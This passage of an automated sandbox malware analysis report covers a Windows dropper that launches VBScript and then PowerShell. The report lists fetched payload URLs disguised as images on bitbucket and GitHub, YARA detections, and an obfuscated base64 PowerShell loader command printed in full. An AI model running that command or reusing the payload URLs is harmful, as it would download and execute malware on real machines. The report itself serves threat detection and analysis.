        Source: global trafficHTTP traffic detected: GET /eqweqwt/wqeqwfs/downloads/agchIkI.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CF97C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760-
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/eqweqwt/wqeqwfs/downloads/agchIkI.txt
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CFEC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875470963.00000179E7FF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.0000024985080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497143877.0000024986D57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496870841.00000249853A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497066916.0000024986CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E51A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.00000249850A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496372407.0000024985106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000B.00000002.1497143877.0000024986D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CFEC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875470963.00000179E7FF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.0000024985080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497143877.0000024986D57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496870841.00000249853A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497066916.0000024986CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E51A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.00000249850A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496372407.0000024985106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,4_2_00007FF7E6E82C54
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E866C44_2_00007FF7E6E866C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E840C44_2_00007FF7E6E840C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E82DB44_2_00007FF7E6E82DB4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E86CA44_2_00007FF7E6E86CA4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E85D904_2_00007FF7E6E85D90
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E81D284_2_00007FF7E6E81D28
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E81C0C4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E835304_2_00007FF7E6E83530
        Source: GdGXG0bnxH.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6328 bytes, 1 file, at 0x2c +A "675c87f6bfee1.vbs", ID 1356, number 1, 1 datablock, 0x1503 compression
        Source: GdGXG0bnxH.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: GdGXG0bnxH.exeBinary or memory string: OriginalFilename vs GdGXG0bnxH.exe
        Source: GdGXG0bnxH.exe, 00000004.00000000.1276448002.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs GdGXG0bnxH.exe
        Source: GdGXG0bnxH.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs GdGXG0bnxH.exe
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5348
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2006
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5348Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2006Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.expl.evad.winEXE@12/9@4/2
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E86CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,4_2_00007FF7E6E86CA4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E866C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,4_2_00007FF7E6E866C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E87AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource,4_2_00007FF7E6E87AC8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
